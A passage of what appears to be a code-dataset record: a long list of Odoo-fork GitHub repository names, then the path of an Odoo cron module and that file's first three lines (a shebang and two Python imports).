oo,grap/OCB,rubencabrera/odoo,cedk/odoo,xujb/odoo,Ichag/odoo,simongoffin/website_version,dariemp/odoo,mlaitinen/odoo,jeasoft/odoo,sv-dev1/odoo,synconics/odoo,tangyiyong/odoo,ecosoft-odoo/odoo,sve-odoo/odoo,OpenPymeMx/OCB,camptocamp/ngo-addons-backport,BT-rmartin/odoo,lombritz/odoo,rubencabrera/odoo,Ernesto99/odoo,grap/OpenUpgrade,juanalfonsopr/odoo,andreparames/odoo,idncom/odoo,abstract-open-solutions/OCB,bobisme/odoo,florian-dacosta/OpenUpgrade,BT-fgarbely/odoo,tvtsoft/odoo8,Nowheresly/odoo,Elico-Corp/odoo_OCB,erkrishna9/odoo,naousse/odoo,Eric-Zhong/odoo,alqfahad/odoo,ovnicraft/odoo,BT-fgarbely/odoo,guewen/OpenUpgrade,takis/odoo,rubencabrera/odoo,pedrobaeza/OpenUpgrade,ecosoft-odoo/odoo,patmcb/odoo,microcom/odoo,factorlibre/OCB,stephen144/odoo,brijeshkesariya/odoo,damdam-s/OpenUpgrade,OpenUpgrade/OpenUpgrade,zchking/odoo,pedrobaeza/odoo,mlaitinen/odoo,odoousers2014/odoo,Daniel-CA/odoo,agrista/odoo-saas,lsinfo/odoo,kirca/OpenUpgrade,jaxkodex/odoo,jusdng/odoo,dariemp/odoo,hopeall/odoo,Danisan/odoo-1,vnsofthe/odoo,sadleader/odoo,bobisme/odoo,omprakasha/odoo,acshan/odoo,Antiun/odoo,ojengwa/odoo,tarzan0820/odoo,jfpla/odoo,n0m4dz/odoo,avoinsystems/odoo,pedrobaeza/OpenUpgrade,xzYue/odoo,FlorianLudwig/odoo,shaufi10/odoo,frouty/odoogoeen,diagramsoftware/odoo,nuuuboo/odoo,ccomb/OpenUpgrade,stephen144/odoo,zchking/odoo,fjbatresv/odoo,dariemp/odoo,x111ong/odoo,frouty/odoo_oph,erkrishna9/odoo,windedge/odoo,janocat/odoo,grap/OCB,hifly/OpenUpgrade,incaser/odoo-odoo,Gitlab11/odoo,hifly/OpenUpgrade,bplancher/odoo,lightcn/odoo,alexcuellar/odoo,jusdng/odoo,rowemoore/odoo,abenzbiria/clients_odoo,lightcn/odoo,fdvarela/odoo8,steedos/odoo,Noviat/odoo,hip-odoo/odoo,JCA-Developpement/Odoo,havt/odoo,hbrunn/OpenUpgrade,bkirui/odoo,savoirfairelinux/odoo,dsfsdgsbngfggb/odoo,ehirt/odoo,arthru/OpenUpgrade,oliverhr/odoo,KontorConsulting/odoo,chiragjogi/odoo,JGarcia-Panach/odoo,vnsofthe/odoo,shingonoide/odoo,CubicERP/odoo,gavin-feng/odoo,jeasoft/odoo,Ichag/odoo,naousse/odoo,gdgellatly/OCB1,dkubiak789/odoo,windedge/odoo,realsaiko/odoo,dfang/odoo,numerigraphe/odoo,rschnapka/odoo,spadae22/odoo,dalegregory/odoo,Nick-OpusVL/odoo,BT-rmartin/odoo,syci/OCB,virgree/odoo,synconics/odoo,mmbtba/odoo,oasiswork/odoo,credativUK/OCB,storm-computers/odoo,collex100/odoo,sadleader/odoo,andreparames/odoo,cdrooom/odoo,markeTIC/OCB,luiseduardohdbackup/odoo,dezynetechnologies/odoo,jesramirez/odoo,syci/OCB,zchking/odoo,lombritz/odoo,frouty/odoo_oph,mvaled/OpenUpgrade,apocalypsebg/odoo,ygol/odoo,jaxkodex/odoo,rschnapka/odoo,cloud9UG/odoo,Nowheresly/odoo,sinbazhou/odoo,FlorianLudwig/odoo,virgree/odoo,nagyistoce/odoo-dev-odoo,vrenaville/ngo-addons-backport,shaufi/odoo,dezynetechnologies/odoo,Elico-Corp/odoo_OCB,BT-rmartin/odoo,wangjun/odoo,shaufi10/odoo,cpyou/odoo,CatsAndDogsbvba/odoo,codekaki/odoo,rschnapka/odoo,fdvarela/odoo8,lightcn/odoo,joariasl/odoo,hip-odoo/odoo,leoliujie/odoo,ThinkOpen-Solutions/odoo,bkirui/odoo,rahuldhote/odoo,BT-ojossen/odoo,kittiu/odoo,codekaki/odoo,ramadhane/odoo,shivam1111/odoo,luiseduardohdbackup/odoo,SerpentCS/odoo,SerpentCS/odoo,jiangzhixiao/odoo,KontorConsulting/odoo,shivam1111/odoo,datenbetrieb/odoo,rahuldhote/odoo,fjbatresv/odoo,avoinsystems/odoo,blaggacao/OpenUpgrade,bakhtout/odoo-educ,jesramirez/odoo,steedos/odoo,bguillot/OpenUpgrade,waytai/odoo,christophlsa/odoo,aviciimaxwell/odoo,fuselock/odoo,n0m4dz/odoo,hmen89/odoo,BT-ojossen/odoo,mszewczy/odoo,ramitalat/odoo,incaser/odoo-odoo,massot/odoo,stonegithubs/odoo,draugiskisprendimai/odoo,savoirfairelinux/OpenUpgrade,diagramsoftware/odoo,OSSESAC/odoopubarquiluz,jaxkodex/odoo,gorjuce/odoo,markeTIC/OCB,prospwro/odoo,andreparames/odoo,mmbtba/odoo,minhtuancn/odoo,CubicERP/odoo,addition-it-solutions/project-all,wangjun/odoo,havt/odoo,takis/odoo,bkirui/odoo,mszewczy/odoo,luiseduardohdbackup/odoo,sebalix/OpenUpgrade,abenzbiria/clients_odoo,laslabs/odoo,MarcosCommunity/odoo,prospwro/odoo,alqfahad/odoo,ShineFan/odoo,jeasoft/odoo,sadleader/odoo,makinacorpus/odoo,frouty/odoo_oph,ihsanudin/odoo,alexteodor/odoo,apanju/GMIO_Odoo,bakhtout/odoo-educ,optima-ict/odoo,omprakasha/odoo,kittiu/odoo,naousse/odoo,draugiskisprendimai/odoo,oihane/odoo,Gitlab11/odoo,codekaki/odoo,florentx/OpenUpgrade,optima-ict/odoo,ihsanudin/odoo,hopeall/odoo,KontorConsulting/odoo,bealdav/OpenUpgrade,leorochael/odoo,Gitlab11/odoo,jolevq/odoopub,grap/OCB,tarzan0820/odoo,srimai/odoo,odoo-turkiye/odoo,hopeall/odoo,Daniel-CA/odoo,agrista/odoo-saas,xujb/odoo,eino-makitalo/odoo,Grirrane/odoo,hassoon3/odoo,ChanduERP/odoo,Elico-Corp/odoo_OCB,nagyistoce/odoo-dev-odoo,Nick-OpusVL/odoo,stephen144/odoo,rgeleta/odoo,realsaiko/odoo,gdgellatly/OCB1,rschnapka/odoo,markeTIC/OCB,lsinfo/odoo,mkieszek/odoo,kifcaliph/odoo,factorlibre/OCB,AuyaJackie/odoo,JGarcia-Panach/odoo,abstract-open-solutions/OCB,hoatle/odoo,jusdng/odoo,ubic135/odoo-design,kybriainfotech/iSocioCRM,JonathanStein/odoo,ramitalat/odoo,FlorianLudwig/odoo,shaufi10/odoo,AuyaJackie/odoo,cedk/odoo,demon-ru/iml-crm,juanalfonsopr/odoo,damdam-s/OpenUpgrade,virgree/odoo,dalegregory/odoo,hopeall/odoo,javierTerry/odoo,guerrerocarlos/odoo,apocalypsebg/odoo,JonathanStein/odoo,mszewczy/odoo,takis/odoo,Antiun/odoo,lgscofield/odoo,ramadhane/odoo,andreparames/odoo,Ernesto99/odoo,codekaki/odoo,ehirt/odoo,srimai/odoo,apanju/odoo,pedrobaeza/odoo,Adel-Magebinary/odoo,wangjun/odoo,jusdng/odoo,srimai/odoo,tinkhaven-organization/odoo,vrenaville/ngo-addons-backport,sergio-incaser/odoo,pedrobaeza/OpenUpgrade,OpenUpgrade-dev/OpenUpgrade,hanicker/odoo,CubicERP/odoo,BT-fgarbely/odoo,patmcb/odoo,draugiskisprendimai/odoo,dgzurita/odoo,dllsf/odootest,fuselock/odoo,dalegregory/odoo,kirca/OpenUpgrade,oliverhr/odoo,javierTerry/odoo,alqfahad/odoo,leoliujie/odoo,fossoult/odoo,dllsf/odootest,prospwro/odoo,ShineFan/odoo,abdellatifkarroum/odoo,salaria/odoo,savoirfairelinux/odoo,abdellatifkarroum/odoo,Antiun/odoo,kybriainfotech/iSocioCRM,fevxie/odoo,mvaled/OpenUpgrade,poljeff/odoo,dalegregory/odoo,rdeheele/odoo,ChanduERP/odoo,ClearCorp-dev/odoo,omprakasha/odoo,jesramirez/odoo,gorjuce/odoo,blaggacao/OpenUpgrade,glovebx/odoo,luiseduardohdbackup/odoo,Endika/odoo,wangjun/odoo,brijeshkesariya/odoo,KontorConsulting/odoo,gsmartway/odoo,dfang/odoo,oasiswork/odoo,tarzan0820/odoo,incaser/odoo-odoo,jpshort/odoo,bobisme/odoo,numerigraphe/odoo,frouty/odoo_oph,virgree/odoo,chiragjogi/odoo,CubicERP/odoo,eino-makitalo/odoo,numerigraphe/odoo,Kilhog/odoo,CopeX/odoo,gavin-feng/odoo,ojengwa/odoo,highco-groupe/odoo,eino-makitalo/odoo,PongPi/isl-odoo,nuuuboo/odoo,shivam1111/odoo,Nick-OpusVL/odoo,OSSESAC/odoopubarquiluz,omprakasha/odoo,sinbazhou/odoo,bkirui/odoo,Nowheresly/odoo,pplatek/odoo,mustafat/odoo-1,rgeleta/odoo,0k/OpenUpgrade,fgesora/odoo,ChanduERP/odoo,xujb/odoo,papouso/odoo,naousse/odoo,Codefans-fan/odoo,alexcuellar/odoo,realsaiko/odoo,leorochael/odoo,luistorresm/odoo,Bachaco-ve/odoo,frouty/odoogoeen,guewen/OpenUpgrade,nuncjo/odoo,jfpla/odoo,sysadminmatmoz/OCB,prospwro/odoo,inspyration/odoo,nhomar/odoo,ccomb/OpenUpgrade,minhtuancn/odoo,gsmartway/odoo,makinacorpus/odoo,odootr/odoo,abstract-open-solutions/OCB,slevenhagen/odoo-npg,hifly/OpenUpgrade,ThinkOpen-Solutions/odoo,OpenPymeMx/OCB,mustafat/odoo-1,rubencabrera/odoo,CubicERP/odoo,Grirrane/odoo,colinnewell/odoo,vnsofthe/odoo,PongPi/isl-odoo,CopeX/odoo,ApuliaSoftware/odoo,oasiswork/odoo,addition-it-solutions/project-all,apanju/GMIO_Odoo,Grirrane/odoo,csrocha/OpenUpgrade,apocalypsebg/odoo,nagyistoce/odoo-dev-odoo,spadae22/odoo,shivam1111/odoo,slevenhagen/odoo-npg,rdeheele/odoo,PongPi/isl-odoo,ecosoft-odoo/odoo,funkring/fdoo,Ernesto99/odoo,jiangzhixiao/odoo,CatsAndDogsbvba/odoo,Bachaco-ve/odoo,havt/odoo,rowemoore/odoo,guewen/OpenUpgrade,fevxie/odoo,erkrishna9/odoo,TRESCLOUD/odoopub,ojengwa/odoo,elmerdpadilla/iv,charbeljc/OCB,BT-ojossen/odoo,x111ong/odoo,FlorianLudwig/odoo,NeovaHealth/odoo,ingadhoc/odoo,MarcosCommunity/odoo,leorochael/odoo,hubsaysnuaa/odoo,factorlibre/OCB,hoatle/odoo,savoirfairelinux/OpenUpgrade,tinkerthaler/odoo,SAM-IT-SA/odoo,Adel-Magebinary/odoo,Noviat/odoo,lightcn/odoo,synconics/odoo,fuhongliang/odoo,synconics/odoo,AuyaJackie/odoo,joshuajan/odoo,Maspear/odoo,virgree/odoo,cpyou/odoo,VitalPet/odoo,havt/odoo,apanju/odoo,pedrobaeza/odoo,Codefans-fan/odoo,Endika/odoo,ehirt/odoo,poljeff/odoo,stephen144/odoo,colinnewell/odoo,matrixise/odoo,srimai/odoo,kybriainfotech/iSocioCRM,CatsAndDogsbvba/odoo,hoatle/odoo,TRESCLOUD/odoopub,odoousers2014/odoo,Adel-Magebinary/odoo,xzYue/odoo,waytai/odoo,lombritz/odoo,Codefans-fan/odoo,papouso/odoo,Ernesto99/odoo,Daniel-CA/odoo,osvalr/odoo,Gitlab11/odoo,nitinitprof/odoo,fdvarela/odoo8,shingonoide/odoo,fuselock/odoo,abstract-open-solutions/OCB,joariasl/odoo,Antiun/odoo,Daniel-CA/odoo,nhomar/odoo-mirror,funkring/fdoo,poljeff/odoo,grap/OCB,OpenUpgrade/OpenUpgrade,VitalPet/odoo,n0m4dz/odoo,bwrsandman/OpenUpgrade,BT-astauder/odoo,Gitlab11/odoo,thanhacun/odoo,apanju/GMIO_Odoo,tvibliani/odoo,sebalix/OpenUpgrade,blaggacao/OpenUpgrade,kybriainfotech/iSocioCRM,gdgellatly/OCB1,storm-computers/odoo,abdellatifkarroum/odoo,Kilhog/odoo,acshan/odoo,jpshort/odoo,Elico-Corp/odoo_OCB,joshuajan/odoo,apanju/odoo,incaser/odoo-odoo,srsman/odoo,sv-dev1/odoo,CopeX/odoo,charbeljc/OCB,realsaiko/odoo,osvalr/odoo,thanhacun/odoo,guerrerocarlos/odoo,funkring/fdoo,rdeheele/odoo,christophlsa/odoo,JCA-Developpement/Odoo,fjbatresv/odoo,grap/OCB,Danisan/odoo-1,ChanduERP/odoo,christophlsa/odoo,mmbtba/odoo,ramadhane/odoo,ujjwalwahi/odoo,vrenaville/ngo-addons-backport,tvibliani/odoo,charbeljc/OCB,syci/OCB,ojengwa/odoo,bplancher/odoo,grap/OpenUpgrade,NeovaHealth/odoo,idncom/odoo,oihane/odoo,bakhtout/odoo-educ,acshan/odoo,jiangzhixiao/odoo,leoliujie/odoo,ecosoft-odoo/odoo,mkieszek/odoo,dgzurita/odoo,dsfsdgsbngfggb/odoo,osvalr/odoo,prospwro/odoo,chiragjogi/odoo,synconics/odoo,leoliujie/odoo,jfpla/odoo,OpenPymeMx/OCB,christophlsa/odoo,pplatek/odoo,apocalypsebg/odoo,slevenhagen/odoo,dsfsdgsbngfggb/odoo,luistorresm/odoo,kirca/OpenUpgrade,javierTerry/odoo,nhomar/odoo-mirror,jfpla/odoo,bkirui/odoo,feroda/odoo,aviciimaxwell/odoo,gvb/odoo,camptocamp/ngo-addons-backport,hifly/OpenUpgrade,SerpentCS/odoo,arthru/OpenUpgrade,stonegithubs/odoo,oliverhr/odoo,Ernesto99/odoo,ramitalat/odoo,luistorresm/odoo,spadae22/odoo,OpenUpgrade-dev/OpenUpgrade,oihane/odoo,pedrobaeza/OpenUpgrade,Nick-OpusVL/odoo,FlorianLudwig/odoo,rahuldhote/odoo,codekaki/odoo,thanhacun/odoo,matrixise/odoo,goliveirab/odoo,shaufi/odoo,papouso/odoo,jolevq/odoopub,odoo-turkiye/odoo,microcom/odoo,BT-fgarbely/odoo,dgzurita/odoo,fjbatresv/odoo,grap/OpenUpgrade,OpusVL/odoo,0k/OpenUpgrade,tinkhaven-organization/odoo,nhomar/odoo-mirror,steedos/odoo,xzYue/odoo,frouty/odoogoeen,Drooids/odoo,ccomb/OpenUpgrade,Nick-OpusVL/odoo,oasiswork/odoo,rgeleta/odoo,fjbatresv/odoo,savoirfairelinux/odoo,savoirfairelinux/odoo,lsinfo/odoo,salaria/odoo,prospwro/odoo,x111ong/odoo,slevenhagen/odoo,bguillot/OpenUpgrade,rahuldhote/odoo,odooindia/odoo,hmen89/odoo,nuncjo/odoo,provaleks/o8,hopeall/odoo,tvtsoft/odoo8,bakhtout/odoo-educ,srimai/odoo,gsmartway/odoo,jeasoft/odoo,spadae22/odoo,windedge/odoo,n0m4dz/odoo,srsman/odoo,cdrooom/odoo,ygol/odoo,Nick-OpusVL/odoo,VitalPet/odoo,naousse/odoo,ccomb/OpenUpgrade,GauravSahu/odoo,fgesora/odoo,zchking/odoo,JonathanStein/odoo,ShineFan/odoo,bplancher/odoo,funkring/fdoo,Endika/odoo,BT-ojossen/odoo,slevenhagen/odoo-npg,eino-makitalo/odoo,VitalPet/odoo,rgeleta/odoo,sadleader/odoo,csrocha/OpenUpgrade,tinkerthaler/odoo,odooindia/odoo,salaria/odoo,kittiu/odoo,arthru/OpenUpgrade,laslabs/odoo,Endika/odoo,QianBIG/odoo,jusdng/odoo,realsaiko/odoo,Daniel-CA/odoo,nhomar/odoo,oihane/odoo,lombritz/odoo,tinkerthaler/odoo,guerrerocarlos/odoo,jiachenning/odoo,ThinkOpen-Solutions/odoo,BT-ojossen/odoo,massot/odoo,salaria/odoo,Antiun/odoo,hip-odoo/odoo,charbeljc/OCB,odoo-turkiye/odoo,makinacorpus/odoo,lsinfo/odoo,charbeljc/OCB,credativUK/OCB,x111ong/odoo,pplatek/odoo,gdgellatly/OCB1,hassoon3/odoo,mvaled/OpenUpgrade,draugiskisprendimai/odoo,Endika/OpenUpgrade,mustafat/odoo-1,bplancher/odoo,tarzan0820/odoo,eino-makitalo/odoo,dalegregory/odoo,luiseduardohdbackup/odoo,Ichag/odoo,storm-computers/odoo,hoatle/odoo,codekaki/odoo,ihsanudin/odoo,dgzurita/odoo,nexiles/odoo,rgeleta/odoo,tangyiyong/odoo,cpyou/odoo,tvtsoft/odoo8,shaufi10/odoo,ehirt/odoo,fossoult/odoo,fuselock/odoo,JGarcia-Panach/odoo,slevenhagen/odoo-npg,alqfahad/odoo,ubic135/odoo-design,kittiu/odoo,vrenaville/ngo-addons-backport,papouso/odoo,hip-odoo/odoo,provaleks/o8,sergio-incaser/odoo,dllsf/odootest,Ichag/odoo,BT-rmartin/odoo,gorjuce/odoo,dkubiak789/odoo,lombritz/odoo,apocalypsebg/odoo,lgscofield/odoo,Maspear/odoo,juanalfonsopr/odoo,datenbetrieb/odoo,dllsf/odootest,ygol/odoo,nhomar/odoo-mirror,abstract-open-solutions/OCB,slevenhagen/odoo,ShineFan/odoo,Adel-Magebinary/odoo,hubsaysnuaa/odoo,vnsofthe/odoo,fdvarela/odoo8,makinacorpus/odoo,fossoult/odoo,0k/OpenUpgrade,Eric-Zhong/odoo,mustafat/odoo-1,hanicker/odoo,hubsaysnuaa/odoo,dkubiak789/odoo,ClearCorp-dev/odoo,datenbetrieb/odoo,nagyistoce/odoo-dev-odoo,vnsofthe/odoo,NL66278/OCB,tangyiyong/odoo,doomsterinc/odoo,dsfsdgsbngfggb/odoo,elmerdpadilla/iv,x111ong/odoo,OpenUpgrade-dev/OpenUpgrade,ingadhoc/odoo,cysnake4713/odoo,Kilhog/odoo,sysadminmatmoz/OCB,optima-ict/odoo,janocat/odoo,csrocha/OpenUpgrade,Ichag/odoo,ubic135/odoo-design,oihane/odoo,ClearCorp-dev/odoo,nitinitprof/odoo,SerpentCS/odoo,dgzurita/odoo,dariemp/odoo,stephen144/odoo,demon-ru/iml-crm,pedrobaeza/odoo,guerrerocarlos/odoo,fossoult/odoo,mmbtba/odoo,Eric-Zhong/odoo,0k/OpenUpgrade,factorlibre/OCB,OpusVL/odoo,fjbatresv/odoo,stonegithubs/odoo,lsinfo/odoo,takis/odoo,RafaelTorrealba/odoo,OpusVL/odoo,idncom/odoo,Kilhog/odoo,dsfsdgsbngfggb/odoo,charbeljc/OCB,papouso/odoo,pedrobaeza/odoo,csrocha/OpenUpgrade,apanju/odoo,ygol/odoo,camptocamp/ngo-addons-backport,sve-odoo/odoo,mvaled/OpenUpgrade,colinnewell/odoo,odooindia/odoo,zchking/odoo,idncom/odoo,alexteodor/odoo,csrocha/OpenUpgrade,oihane/odoo,Drooids/odoo,apanju/odoo,ovnicraft/odoo,inspyration/odoo,nhomar/odoo,kybriainfotech/iSocioCRM,sebalix/OpenUpgrade,andreparames/odoo,sv-dev1/odoo,alexcuellar/odoo,srsman/odoo,Drooids/odoo,colinnewell/odoo,janocat/odoo,idncom/odoo,BT-astauder/odoo,storm-computers/odoo,doomsterinc/odoo,incaser/odoo-odoo,idncom/odoo,sadleader/odoo,windedge/odoo,lgscofield/odoo,jeasoft/odoo,mlaitinen/odoo,hbrunn/OpenUpgrade,JCA-Developpement/Odoo,gvb/odoo,kirca/OpenUpgrade,Grirrane/odoo,klunwebale/odoo,odootr/odoo,thanhacun/odoo,aviciimaxwell/odoo,OpenPymeMx/OCB,csrocha/OpenUpgrade,alexcuellar/odoo,BT-fgarbely/odoo,AuyaJackie/odoo,cysnake4713/odoo,sergio-incaser/odoo,rowemoore/odoo,florian-dacosta/OpenUpgrade,salaria/odoo,ingadhoc/odoo,bwrsandman/OpenUpgrade,colinnewell/odoo,addition-it-solutions/project-all,lgscofield/odoo,tarzan0820/odoo,srsman/odoo,laslabs/odoo,PongPi/isl-odoo,arthru/OpenUpgrade,hanicker/odoo,florentx/OpenUpgrade,apanju/GMIO_Odoo,klunwebale/odoo,shingonoide/odoo,CopeX/odoo,TRESCLOUD/odoopub,bobisme/odoo,draugiskisprendimai/odoo,klunwebale/odoo,damdam-s/OpenUpgrade,chiragjogi/odoo,vnsofthe/odoo,Noviat/odoo,OSSESAC/odoopubarquiluz,sebalix/OpenUpgrade,Ernesto99/odoo,BT-ojossen/odoo,christophlsa/odoo,abstract-open-solutions/OCB,oihane/odoo,dkubiak789/odoo,storm-computers/odoo,glovebx/odoo,vrenaville/ngo-addons-backport,srsman/odoo,ecosoft-odoo/odoo,SAM-IT-SA/odoo,MarcosCommunity/odoo,hbrunn/OpenUpgrade,Eric-Zhong/odoo,xzYue/odoo,draugiskisprendimai/odoo,tangyiyong/odoo,tvibliani/odoo,frouty/odoogoeen,lightcn/odoo,mszewczy/odoo,JGarcia-Panach/odoo,Danisan/odoo-1,ingadhoc/odoo,x111ong/odoo,provaleks/o8,bealdav/OpenUpgrade,stonegithubs/odoo,odootr/odoo,gdgellatly/OCB1,bguillot/OpenUpgrade,NeovaHealth/odoo,mmbtba/odoo,rdeheele/odoo,dgzurita/odoo,incaser/odoo-odoo,factorlibre/OCB,florian-dacosta/OpenUpgrade,ehirt/odoo,JCA-Developpement/Odoo,VielSoft/odoo,apanju/GMIO_Odoo,fuhongliang/odoo,javierTerry/odoo,fevxie/odoo,credativUK/OCB,Endika/OpenUpgrade,kifcaliph/odoo,sv-dev1/odoo,vrenaville/ngo-addons-backport,Grirrane/odoo,Codefans-fan/odoo,dariemp/odoo,odooindia/odoo,ccomb/OpenUpgrade,Kilhog/odoo,kifcaliph/odoo,dfang/odoo,cloud9UG/odoo,hopeall/odoo,dalegregory/odoo,leorochael/odoo,n0m4dz/odoo,jpshort/odoo,ShineFan/odoo,ujjwalwahi/odoo,RafaelTorrealba/odoo,fuhongliang/odoo,zchking/odoo,slevenhagen/odoo,sebalix/OpenUpgrade,abdellatifkarroum/odoo,glovebx/odoo,mszewczy/odoo,florentx/OpenUpgrade,microcom/odoo,acshan/odoo,sebalix/OpenUpgrade,grap/OpenUpgrade,juanalfonsopr/odoo,jusdng/odoo,Bachaco-ve/odoo,grap/OpenUpgrade,aviciimaxwell/odoo,VielSoft/odoo,minhtuancn/odoo,hanicker/odoo,SAM-IT-SA/odoo,janocat/odoo,codekaki/odoo,osvalr/odoo,Antiun/odoo,windedge/odoo,tinkhaven-organization/odoo,massot/odoo,feroda/odoo,Codefans-fan/odoo,cedk/odoo,florian-dacosta/OpenUpgrade,fossoult/odoo,Noviat/odoo,Grirrane/odoo,sysadminmatmoz/OCB,luistorresm/odoo,mmbtba/odoo,dariemp/odoo,alqfahad/odoo,gsmartway/odoo,abenzbiria/clients_odoo,ojengwa/odoo,rgeleta/odoo,datenbetrieb/odoo,JGarcia-Panach/odoo,OpenUpgrade/OpenUpgrade,inspyration/odoo,alexteodor/odoo,odoo-turkiye/odoo,bguillot/OpenUpgrade,gsmartway/odoo,bguillot/OpenUpgrade,gdgellatly/OCB1,lgscofield/odoo,shivam1111/odoo,dkubiak789/odoo,markeTIC/OCB,n0m4dz/odoo,Nowheresly/odoo,CubicERP/odoo,steedos/odoo,agrista/odoo-saas,leoliujie/odoo,damdam-s/OpenUpgrade,nitinitprof/odoo,nuuuboo/odoo,OpenPymeMx/OCB,papouso/odoo,shingonoide/odoo,deKupini/erp,kirca/OpenUpgrade,storm-computers/odoo,credativUK/OCB,leorochael/odoo,odootr/odoo,virgree/odoo,lsinfo/odoo,christophlsa/odoo,xujb/odoo,hifly/OpenUpgrade,bakhtout/odoo-educ,numerigraphe/odoo,ygol/odoo,bplancher/odoo,oasiswork/odoo,fuselock/odoo,hubsaysnuaa/odoo,alexcuellar/odoo,waytai/odoo,OpenPymeMx/OCB,OpenUpgrade/OpenUpgrade,codekaki/odoo,florentx/OpenUpgrade,dfang/odoo,hifly/OpenUpgrade,dfang/odoo,kittiu/odoo,ramitalat/odoo,waytai/odoo,xujb/odoo,shivam1111/odoo,joshuajan/odoo,ihsanudin/odoo,tvtsoft/odoo8,highco-groupe/odoo,avoinsystems/odoo,guewen/OpenUpgrade,dsfsdgsbngfggb/odoo,srimai/odoo,rschnapka/odoo,Maspear/odoo,Adel-Magebinary/odoo,wangjun/odoo,oliverhr/odoo,agrista/odoo-saas,VielSoft/odoo,numerigraphe/odoo,OpusVL/odoo,cloud9UG/odoo,leorochael/odoo,ApuliaSoftware/odoo,diagramsoftware/odoo,lgscofield/odoo,bkirui/odoo,tarzan0820/odoo,diagramsoftware/odoo,diagramsoftware/odoo,blaggacao/OpenUpgrade,bealdav/OpenUpgrade,gavin-feng/odoo,klunwebale/odoo,jpshort/odoo,rahuldhote/odoo,jesramirez/odoo,ThinkOpen-Solutions/odoo,GauravSahu/odoo,Adel-Magebinary/odoo,hoatle/odoo,NL66278/OCB,gavin-feng/odoo,jusdng/odoo,shaufi/odoo,tvtsoft/odoo8,guerrerocarlos/odoo,optima-ict/odoo,Maspear/odoo,hassoon3/odoo,odootr/odoo,arthru/OpenUpgrade,QianBIG/odoo,markeTIC/OCB,rowemoore/odoo,waytai/odoo,Eric-Zhong/odoo,markeTIC/OCB,jiachenning/odoo,ClearCorp-dev/odoo,hbrunn/OpenUpgrade,dllsf/odootest,mvaled/OpenUpgrade,bwrsandman/OpenUpgrade,funkring/fdoo,rubencabrera/odoo,avoinsystems/odoo,juanalfonsopr/odoo,Noviat/odoo,ihsanudin/odoo,osvalr/odoo,credativUK/OCB,kirca/OpenUpgrade,jpshort/odoo,dkubiak789/odoo,glovebx/odoo,BT-rmartin/odoo,CatsAndDogsbvba/odoo,ujjwalwahi/odoo,dfang/odoo,VitalPet/odoo,javierTerry/odoo,tinkhaven-organization/odoo,aviciimaxwell/odoo,ramadhane/odoo,SerpentCS/odoo,addition-it-solutions/project-all,naousse/odoo,jiachenning/odoo,guerrerocarlos/odoo,Ichag/odoo,pplatek/odoo,glovebx/odoo,apocalypsebg/odoo,dsfsdgsbngfggb/odoo,GauravSahu/odoo,hanicker/odoo,dezynetechnologies/odoo,ecosoft-odoo/odoo,bobisme/odoo,frouty/odoo_oph,cysnake4713/odoo,Gitlab11/odoo,sergio-incaser/odoo,guewen/OpenUpgrade,OSSESAC/odoopubarquiluz,Danisan/odoo-1,SerpentCS/odoo,apanju/GMIO_Odoo,cysnake4713/odoo,rowemoore/odoo,savoirfairelinux/OpenUpgrade,luistorresm/odoo,wangjun/odoo,bealdav/OpenUpgrade,cedk/odoo,dkubiak789/odoo,idncom/odoo,minhtuancn/odoo,eino-makitalo/odoo,tinkhaven-organization/odoo,joariasl/odoo,synconics/odoo,BT-rmartin/odoo,florian-dacosta/OpenUpgrade,mustafat/odoo-1,bguillot/OpenUpgrade,RafaelTorrealba/odoo,ramitalat/odoo,hoatle/odoo,rgeleta/odoo,tangyiyong/odoo,bwrsandman/OpenUpgrade,VielSoft/odoo,aviciimaxwell/odoo,klunwebale/odoo,nexiles/odoo,VitalPet/odoo,joariasl/odoo,Adel-Magebinary/odoo,dariemp/odoo,mlaitinen/odoo,grap/OpenUpgrade,apanju/GMIO_Odoo,Drooids/odoo,waytai/odoo,0k/OpenUpgrade,cpyou/odoo,OpenUpgrade/OpenUpgrade,jaxkodex/odoo,omprakasha/odoo,damdam-s/OpenUpgrade,xujb/odoo,grap/OCB,leoliujie/odoo,GauravSahu/odoo,oliverhr/odoo,tvibliani/odoo,spadae22/odoo,MarcosCommunity/odoo,zchking/odoo,JonathanStein/odoo,elmerdpadilla/iv,tvibliani/odoo,avoinsystems/odoo,dezynetechnologies/odoo,collex100/odoo,alhashash/odoo,JonathanStein/odoo,kittiu/odoo,fgesora/odoo,ccomb/OpenUpgrade,deKupini/erp,jeasoft/odoo,nitinitprof/odoo,salaria/odoo,patmcb/odoo,poljeff/odoo,cdrooom/odoo,alexteodor/odoo,CopeX/odoo,KontorConsulting/odoo,MarcosCommunity/odoo,datenbetrieb/odoo,klunwebale/odoo,sysadminmatmoz/OCB,ojengwa/odoo,juanalfonsopr/odoo,guewen/OpenUpgrade,sysadminmatmoz/OCB,optima-ict/odoo,gorjuce/odoo,jiangzhixiao/odoo,addition-it-solutions/project-all,savoirfairelinux/odoo,ThinkOpen-Solutions/odoo,abstract-open-solutions/OCB,damdam-s/OpenUpgrade,nexiles/odoo,janocat/odoo,lightcn/odoo,Drooids/odoo,papouso/odoo,bobisme/odoo,makinacorpus/odoo,nagyistoce/odoo-dev-odoo,odootr/odoo,brijeshkesariya/odoo,ojengwa/odoo,ujjwalwahi/odoo,glovebx/odoo,shingonoide/odoo,syci/OCB,mszewczy/odoo,provaleks/o8,colinnewell/odoo,collex100/odoo,nhomar/odoo,ChanduERP/odoo,GauravSahu/odoo,savoirfairelinux/odoo,0k/odoo,massot/odoo,fgesora/odoo,xzYue/odoo,ujjwalwahi/odoo,mmbtba/odoo,AuyaJackie/odoo,Eric-Zhong/odoo,nexiles/odoo,tvtsoft/odoo8,cloud9UG/odoo,frouty/odoogoeen,srsman/odoo,abenzbiria/clients_odoo,xujb/odoo,bakhtout/odoo-educ,naousse/odoo,laslabs/odoo,slevenhagen/odoo,SAM-IT-SA/odoo,BT-rmartin/odoo,ovnicraft/odoo,OpenPymeMx/OCB,makinacorpus/odoo,odoo-turkiye/odoo,arthru/OpenUpgrade,Bachaco-ve/odoo,feroda/odoo,VielSoft/odoo,hifly/OpenUpgrade,simongoffin/website_version,leoliujie/odoo,mkieszek/odoo,avoinsystems/odoo,deKupini/erp,ygol/odoo,sergio-incaser/odoo,simongoffin/website_version,patmcb/odoo,GauravSahu/odoo,highco-groupe/odoo,luistorresm/odoo,mlaitinen/odoo,pedrobaeza/OpenUpgrade,shaufi10/odoo,shingonoide/odoo | addons/account_analytic_analysis/cron_account_analytic_account.py | addons/account_analytic_analysis/cron_account_analytic_account.py | #!/usr/bin/env python
from osv import osv
from mako.template import Template
